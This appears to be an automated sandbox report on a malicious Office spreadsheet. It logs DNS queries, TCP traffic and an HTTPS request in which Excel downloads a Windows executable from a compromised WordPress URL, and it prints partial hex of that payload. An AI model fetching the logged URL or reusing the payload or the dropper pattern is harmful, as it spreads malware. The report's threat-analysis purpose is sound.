                                  File Content Preview:PK........e.4S................docProps/PK..........!.................docProps/app.xml.S.n.0.....`.^.Z.*d\.(U.n.*.....x...g.`.~M........7y~.b..]Y...Z....K8.g|j.f._V.W..!i...;..= .S_..E.....,J8.......&.Rc/..2....X...Yf..{.-...N.....K!..ZA..8...ESo...u......

                                  File Icon

                                  Icon Hash:e4e2ea8aa4b4b4b4

                                  Network Behavior

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Oct 21, 2021 19:40:38.022088051 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:38.022130966 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:38.022202015 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:38.031810999 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:38.031848907 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:38.378602028 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:38.378863096 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:38.396579027 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:38.396631956 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:38.396995068 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:38.397089005 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:38.647598982 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:38.691153049 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:38.820774078 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:38.820897102 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:38.820897102 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:38.820925951 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:38.821001053 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:38.821014881 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:38.821080923 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:38.982139111 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:38.982347965 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:38.982455015 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:38.982492924 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:38.982527018 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:38.982534885 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:38.982588053 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:38.982603073 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:38.982628107 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:38.982662916 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:38.983133078 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.144455910 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.144665956 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.144773960 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.144805908 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.144834995 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.144843102 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.144886017 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.144900084 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.144933939 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.144968987 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.145030022 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.145153046 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.145193100 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.145287037 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.145334005 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.145368099 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.145524025 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.145534992 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.145575047 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.145690918 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.147252083 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.148221016 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.306849003 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.307101965 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.307235956 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.307274103 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.307393074 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.307544947 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.307570934 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.307667017 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.307667971 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.307679892 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.307704926 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.307821035 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.307967901 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.308128119 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.308235884 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.308439016 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.308461905 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.308476925 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.308667898 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.308711052 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.308850050 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.308943987 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.309081078 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.309196949 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.309360027 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.309433937 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.309564114 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.309670925 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.309787035 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.309886932 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.310008049 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.311685085 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.319472075 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.469398022 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.469507933 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.469605923 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.469824076 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.469855070 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.469882011 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.469958067 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.469983101 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.470026970 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.470108032 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.470129013 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.470133066 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.470200062 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.470258951 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.470263958 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.470295906 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.470334053 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.470402956 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.470413923 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.470474958 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.470525980 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.470529079 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.470534086 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.470540047 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.470609903 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.470618963 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.470630884 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.470725060 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.470727921 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.470741987 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.470838070 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.470839977 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.470860958 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.470936060 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.470957994 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.471002102 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.471045017 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.471060991 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.471065044 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.471147060 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.471158028 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.471178055 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.471189022 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.471220970 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.471271038 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.471299887 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.471313953 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.471329927 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.471334934 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.471389055 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.471416950 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.471438885 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.471455097 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.471461058 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.471463919 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.471522093 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.471681118 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.496195078 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.496234894 CEST4434916550.87.248.41192.168.2.22
                                  Oct 21, 2021 19:40:39.496251106 CEST49165443192.168.2.2250.87.248.41
                                  Oct 21, 2021 19:40:39.496311903 CEST49165443192.168.2.2250.87.248.41

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Oct 21, 2021 19:40:37.892031908 CEST5216753192.168.2.228.8.8.8
                                  Oct 21, 2021 19:40:38.001221895 CEST53521678.8.8.8192.168.2.22
                                  Oct 21, 2021 19:41:50.414472103 CEST5059153192.168.2.228.8.8.8
                                  Oct 21, 2021 19:41:50.437865973 CEST53505918.8.8.8192.168.2.22
                                  Oct 21, 2021 19:42:10.523245096 CEST5780553192.168.2.228.8.8.8
                                  Oct 21, 2021 19:42:10.546617985 CEST53578058.8.8.8192.168.2.22
                                  Oct 21, 2021 19:42:30.637613058 CEST5903053192.168.2.228.8.8.8
                                  Oct 21, 2021 19:42:30.666851044 CEST53590308.8.8.8192.168.2.22

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                  Oct 21, 2021 19:40:37.892031908 CEST192.168.2.228.8.8.80x2a3dStandard query (0)iqwasithealth.comA (IP address)IN (0x0001)
                                  Oct 21, 2021 19:41:50.414472103 CEST192.168.2.228.8.8.80x4f8bStandard query (0)apt.updateffboruse.comA (IP address)IN (0x0001)
                                  Oct 21, 2021 19:42:10.523245096 CEST192.168.2.228.8.8.80xa13aStandard query (0)app.updatebrouser.comA (IP address)IN (0x0001)
                                  Oct 21, 2021 19:42:30.637613058 CEST192.168.2.228.8.8.80xb209Standard query (0)apt.updateffboruse.comA (IP address)IN (0x0001)

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                  Oct 21, 2021 19:40:38.001221895 CEST8.8.8.8192.168.2.220x2a3dNo error (0)iqwasithealth.com50.87.248.41A (IP address)IN (0x0001)
                                  Oct 21, 2021 19:41:50.437865973 CEST8.8.8.8192.168.2.220x4f8bName error (3)apt.updateffboruse.comnonenoneA (IP address)IN (0x0001)
                                  Oct 21, 2021 19:42:10.546617985 CEST8.8.8.8192.168.2.220xa13aName error (3)app.updatebrouser.comnonenoneA (IP address)IN (0x0001)
                                  Oct 21, 2021 19:42:30.666851044 CEST8.8.8.8192.168.2.220xb209Name error (3)apt.updateffboruse.comnonenoneA (IP address)IN (0x0001)

                                  HTTP Request Dependency Graph

                                  • iqwasithealth.com

                                  HTTPS Proxied Packets

                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  0192.168.2.224916550.87.248.41443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  TimestampkBytes transferredDirectionData
                                  2021-10-21 17:40:38 UTC0OUTGET /wp-content/uploads/2019/06/a435gfhs109.cms HTTP/1.1
                                  Accept: */*
                                  UA-CPU: AMD64
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                  Host: iqwasithealth.com
                                  Connection: Keep-Alive
                                  2021-10-21 17:40:38 UTC0INHTTP/1.1 200 OK
                                  Date: Thu, 21 Oct 2021 17:40:38 GMT
                                  Server: Apache
                                  Upgrade: h2,h2c
                                  Connection: Upgrade, close
                                  Last-Modified: Wed, 22 Sep 2021 11:30:59 GMT
                                  Accept-Ranges: bytes
                                  Content-Length: 353792
                                  host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                  Referrer-Policy:
                                  2021-10-21 17:40:38 UTC0INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 5a 65 d9 44 3b 0b 8a 44 3b 0b 8a 44 3b 0b 8a f0 a7 f9 8a 4e 3b 0b 8a f0 a7 f8 8a 3e 3b 0b 8a f0 a7 f9 8a 67 3b 0b 8a 16 53 0d 8b 67 3b 0b 8a 16 53 0e 8b 51 3b 0b 8a 16 53 0f 8b 4a 3b 0b 8a f0 a7 e4 8a 47 3b 0b 8a 44 3b 0a 8a 26 3b 0b 8a 16 53 02 8b 4e 3b 0b 8a 16 53 0b 8b 45 3b 0b 8a 16 53 f4 8a 45 3b 0b 8a 16 53 08 8b 45 3b 0b 8a 52 69 63 68 44 3b 0b 8a 00 00 00 00 00 00 00
                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ZeD;D;D;N;>;g;Sg;SQ;SJ;G;D;&;SN;SE;SE;SE;RichD;
                                  2021-10-21 17:40:38 UTC8INData Raw: ff ff 90 48 8b d0 48 8b 8f d0 00 00 00 ff 15 79 e6 1a 00 90 48 8d 4d 40 ff 15 46 d5 1a 00 b9 20 00 00 00 e8 04 32 15 00 48 8b d8 48 89 45 40 48 85 c0 74 27 48 8b 97 d0 00 00 00 48 8b c8 ff 15 80 ff 1a 00 48 8d 05 09 63 1b 00 48 89 03 48 8d 05 6f 62 1b 00 48 89 43 10 eb 03 49 8b dc 48 89 9f d8 00 00 00 48 8d 55 40 48 8d 4d 40 e8 5a d2 ff ff 90 48 8b d0 48 8b 8f d8 00 00 00 ff 15 09 e6 1a 00 90 48 8d 4d 40 ff 15 d6 d4 1a 00 44 89 64 24 20 45 33 c9 45 33 c0 41 8d 51 0a 48 8b 8f d8 00 00 00 ff 15 2a 02 1b 00 b9 38 00 00 00 e8 78 31 15 00 48 89 45 40 48 85 c0 74 14 45 8b c4 48 8b 97 d0 00 00 00 48 8b c8 e8 1d 44 ea ff eb 03 49 8b c4 48 89 87 e0 00 00 00 48 8d 55 40 48 8d 4d 40 e8 14 d2 ff ff 90 48 8b d0 48 8b 8f e0 00 00 00 ff 15 93 e5 1a 00 90 48 8d 4d 40 ff
                                  Data Ascii: HHyHM@F 2HHE@Ht'HHHcHHobHCIHHU@HM@ZHHHM@Dd$ E3E3AQH*8x1HE@HtEHHDIHHU@HM@HHHM@
                                  2021-10-21 17:40:38 UTC16INData Raw: 18 9e fe 00 00 00 00 06 06 0b 0b ff ff f5 e1 b7 f7 f2 7f 77 d4 a2 00 00 ff ff 00 00 03 03 03 03 07 07 e2 7c 4e 2e a7 ff ff 00 00 00 00 ff ff 8e 2a 4f 74 f6 89 57 ff ff 00 00 04 f5 61 d4 5b 96 85 c2 9e 4a 04 ff ff 00 00 ff ff 00 00 b0 b5 25 fb 32 a7 e4 29 00 00 03 03 ff ff 00 00 00 00 00 00 ff ff fe d0 89 4a a3 34 38 e1 4f 56 53 ef f3 fe 00 00 00 00 00 00 ed ce 5f b6 81 f7 0a 0a 00 00 00 00 01 01 f3 25 f6 36 99 61 59 07 07 07 07 08 08 00 00 0a 0a 00 cd 59 39 58 a6 5f e8 20 eb 7f 57 00 00 00 00 00 07 07 04 04 07 07 08 4e f9 e3 15 6a 6f db 3d ba e2 c3 17 98 af 08 00 00 00 00 00 00 06 3f 39 fe f7 99 06 00 00 00 00 0c a9 cb a1 ce af cc 46 7b ff ff 00 00 ff ff 00 00 00 75 95 e4 d8 74 00 00 00 00 00 ff ff 07 07 08 08 04 04 07 07 7a d0 14 fe aa 66 24 02 02 00 00
                                  Data Ascii: w|N.*OtWa[J%2)J48OVS_%6aYY9X_ WNjo=?9F{utzf$
                                  2021-10-21 17:40:38 UTC23INData Raw: 30 da ce cc 00 48 98 4c 00 00 28 af e8 45 e3 48 cc 38 50 cf f1 4c 96 00 c6 4e 8b 48 ff 34 70 48 1f df b6 08 e8 01 c0 38 f7 25 cb 1c 48 48 f4 c8 c0 24 e8 48 00 48 c7 8b fd d8 33 03 00 ff 8b ff 20 48 1e f8 89 15 cf 8b e8 8b e8 b1 0f c0 4c 48 48 0a 50 f0 24 7c 3b 49 d2 06 89 00 cc 2f ba 48 b1 74 8d 27 ff ff 8d 08 24 7c 00 cc 02 00 08 89 4c 48 0c 00 75 56 83 e3 8b 25 0f 75 02 fd 32 24 8d 00 ff ba da 72 2b c8 7d e2 84 ff ec 00 89 8b 89 f7 08 4c ff 02 48 58 2f 27 20 85 44 c4 a6 c8 84 20 c3 c0 4f 48 8d 2e 4c 48 0f 28 62 ff ff 89 79 01 00 15 8d 74 f0 5e d9 ff 8b 8b 48 50 44 89 00 b0 8b 30 08 10 48 44 00 4c 10 00 45 8d 4d 8b 00 48 57 05 4b 24 ff 20 24 90 89 c4 24 8b 27 56 48 8b 8d 15 00 48 eb 48 37 a0 48 8d c3 ff 81 ef 38 53 cc 54 41 8b 11 a8 0f e8 1c 48 c4 cc 48
                                  Data Ascii: 0HL(EH8PLNH4pH8%HH$HH3 HLHHP$|;I/Ht'$|LHuV%u2$r+}LHX/' D OH.LH(byt^HPD0HDLEMHWK$ $$'VHHH7H8STAHH
                                  2021-10-21 17:40:39 UTC31INData Raw: 39 6b 7c 46 e6 66 96 70 ff 01 01 00 00 7e 9b 16 0a 0d 9a 00 00 08 08 00 00 05 05 00 d5 18 61 15 4d 6c ed 00 09 09 00 00 00 00 00 00 ff ff 00 00 ff ff 47 25 bb be ad 99 14 4a b0 03 f8 01 01 0a 0a 04 04 00 ab 14 3e 98 62 94 48 9b b7 e7 cb 97 92 40 00 00 00 ff ff 00 00 ff 09 02 96 e2 22 ff 0a 0a ff ff 03 03 00 00 00 00 c9 c7 5e f8 8c 4c 4a b9 bd 00 00 00 00 05 05 00 00 00 00 ff ff 9f 18 a4 b4 10 01 01 0a 0a 00 00 00 00 34 9f 94 b6 99 57 83 00 00 00 00 04 75 57 b5 2b 09 91 9d f7 85 04 00 00 00 00 ff ff 00 00 d5 b3 f1 22 ea 2d 0b 55 06 06 09 09 00 00 00 00 07 07 00 00 00 00 00 d5 c6 7b 3f 18 2b 84 3a b4 55 c8 6d 00 00 00 00 00 ff ff 25 42 db 26 36 3e 00 00 08 08 08 08 00 00 3f 33 35 4c 4d 3a 21 00 00 ff ff 00 00 00 00 ff ff 00 60 e5 18 9d 1a 8a 72 48 53 b3 66
                                  Data Ascii: 9k|Ffp~aMlG%J>bH@"^LJ4WuW+"-U{?+:Um%B&6>?35LM:!`rHSf
                                  2021-10-21 17:40:39 UTC39INData Raw: 07 00 00 00 00 0a 0a 00 4a 6d 5a 8e 5f 5b 2e 00 00 00 00 00 fe fe 00 00 00 00 bc 2f 1d 39 7b 89 19 34 bf 00 00 00 00 09 09 00 00 ff ff 01 01 0e 71 8d 6b 89 50 5f 82 02 02 00 00 04 04 01 01 22 f2 ed 23 ee 84 c7 14 fd e5 ba dc 00 00 00 00 00 dd 57 d8 56 ad 5b 00 00 00 00 00 00 00 00 00 60 41 c0 9f 71 ad d1 00 00 00 00 ff ff 03 03 0b 0b 00 00 00 00 00 16 1f a9 9b e3 d8 3b bd 7f d3 2b 00 01 01 00 00 ff ff 71 96 a6 e4 9b 3c 96 b5 94 61 59 1c 27 de 00 00 ff ff 02 02 01 01 11 a8 c7 d7 a8 00 00 00 00 00 00 00 00 00 00 00 ac 2d 12 ba 81 c0 b6 fe aa 00 00 00 00 00 00 00 0b 0b 00 00 00 c9 ca 6b 64 36 00 00 00 00 00 07 07 00 f0 32 14 67 a2 ca 34 00 ff ff 03 03 30 04 93 fd 9f d9 58 13 1a 04 04 00 00 00 00 00 00 00 de e8 6e b7 57 c4 08 d2 00 03 03 00 00 00 00 00 00 00
                                  Data Ascii: JmZ_[./9{4qkP_"#WV[`Aq;+q<aY'-kd62g40XnW
                                  2021-10-21 17:40:39 UTC47INData Raw: b7 86 04 06 06 08 08 05 05 80 08 32 68 1b 00 00 00 00 00 00 00 00 e7 39 8a c2 db 96 7e ff ff 00 00 00 00 04 04 00 00 ff 2e 9f 37 7c b8 6f 88 ab a4 ff 00 00 0b 0b 09 09 04 04 00 00 00 0e 51 00 24 54 bc f8 9b 00 00 00 ff ff 00 00 04 a0 5c 3f 65 02 cf 2c b7 77 21 6b b0 04 00 00 02 02 b3 76 60 e4 27 db 07 07 07 07 00 00 04 04 ff 7b 8c da fb 8e f4 bc ff 00 00 03 03 00 00 08 08 ff ff ff ff 00 00 e3 27 55 e5 f2 91 3b 59 93 4a e1 00 00 00 00 00 00 00 ed 2d d6 e0 75 a1 c1 14 6c 62 a6 e4 37 b6 00 ff ff 00 00 00 00 00 4e 49 3d 9c 8c 00 01 01 00 00 00 00 06 06 00 00 56 3d 82 9c 3e bb d6 0a 9b ff ff 0b 0b fe fe 00 00 00 00 00 00 87 de 84 34 c7 ff ff 00 00 ff ff 07 07 ea 92 a7 dd 12 1d b5 ff ff 00 00 ff ec fc c4 99 e1 71 cd 2a 0c ff 00 00 01 01 ff ff 0a 0a 30 d2 dd 58
                                  Data Ascii: 2h9~.7|oQ$T\?e,w!kv`'{'U;YJ-ulb7NI=V=>4q*0X
                                  2021-10-21 17:40:39 UTC55INData Raw: 21 de 82 e5 08 00 00 01 01 1e d3 5e 5d be e8 02 69 89 e6 30 94 26 79 00 00 03 03 00 00 00 00 00 7d e6 64 b4 bb 00 00 00 00 00 00 00 00 00 04 04 03 03 08 08 17 54 de 18 7c e7 46 ae fd 0a 0a 02 02 00 00 ff 5e f3 d4 cc 16 ff 00 00 07 07 00 00 07 da 6c 18 02 14 8a de 07 00 00 00 00 00 00 00 00 08 08 66 38 b2 8f e0 0d d0 45 a1 01 01 00 00 07 07 04 04 00 00 00 00 cd 00 6e c4 1a 64 66 21 00 00 00 00 00 00 06 06 3c 79 da 2c 5d 14 23 5f cd 44 eb 30 00 00 00 00 08 d1 df 43 6d bd c8 08 00 00 00 00 00 00 08 08 c2 bf 05 0a 2b 00 da 0b 0b 05 05 00 00 02 02 ff ff 00 00 00 00 00 07 b6 ac c0 2c a1 68 1d 81 cd 9d 00 00 00 00 00 ff ff 0e e8 cd 32 07 ee 9d b4 23 29 97 75 57 77 fe fe 00 00 00 00 07 07 b9 08 f6 b6 ea 00 00 00 00 00 00 07 07 08 08 ff ff 62 91 b3 52 93 98 e3 8b
                                  Data Ascii: !^]i0&y}dT|F^lf8Endf!<y,]#_D0Cm+,h2#)uWwbR
                                  2021-10-21 17:40:39 UTC63INData Raw: ff cc 48 48 00 14 00 8d 0b 30 eb 00 d0 58 ef 0f c6 e8 40 ff 48 8d 89 24 05 1f 44 92 48 8b e8 fb da 8d 60 48 eb 8b 75 e0 48 44 00 48 63 f9 48 c5 00 89 09 48 8d 20 47 4d d8 27 ff 08 74 74 12 4c 00 fc 48 48 15 c3 64 cc 05 8b 15 ff bd 24 83 00 c6 50 d8 30 2c 8b 8b 32 cc 15 d8 4d 24 8b 48 8d 17 48 2e 8b e8 cc 75 48 cf 90 ff 4d 4c 41 8b 20 24 83 8d 4c 49 cc 8b 48 c1 7f 85 8b f8 91 ff ec c7 00 89 5f 90 83 00 ff 48 c7 48 0a 11 d2 00 00 48 51 ff ce 48 8b c8 48 8d 48 8b ff 8b 01 08 8e 1e 3b 8d c6 b0 48 48 00 f0 85 00 49 98 8b f4 97 48 cc c8 c3 4c ff 74 48 07 15 15 24 00 5c 24 09 fe c2 01 fc cc ff 20 00 8b 24 8b 4d 03 cb 44 8d cc ff 48 00 cc 48 cc 48 4c 8b 6c 1a 1f 38 c7 24 53 8b 83 30 00 89 41 c7 41 84 44 00 8d 8b c3 8d ff 8b 48 cc 74 ff 00 48 83 03 80 02 74 cc 48
                                  Data Ascii: HH0X@H$DH`HuHDHcHH GM'ttLHHd$P0,2M$HH.uHMLA $LIH_HHHQHHH;HHIHLtH$\$ $MDHHHLl8$S0AADHtHtH
